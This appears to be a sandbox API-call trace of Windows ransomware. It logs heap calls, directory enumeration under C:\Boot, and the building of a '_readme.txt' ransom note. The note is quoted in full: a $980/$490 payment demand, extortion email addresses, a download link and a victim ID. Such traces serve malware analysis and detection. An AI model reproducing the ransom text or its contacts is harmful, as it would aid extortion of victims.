returned 0x3466cb0 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.701] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.701] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0228.701] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.701] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.701] PathFindFileNameW (pszPath="") returned="" [0228.702] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.702] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.702] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.702] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.702] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0228.702] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0228.703] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.703] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" [0228.703] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0228.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3467538 | out: hHeap=0x620000) returned 1 [0228.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b818 | out: hHeap=0x620000) returned 1 [0228.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.703] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0228.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.703] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0228.703] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0228.703] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0228.703] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.704] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.704] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, 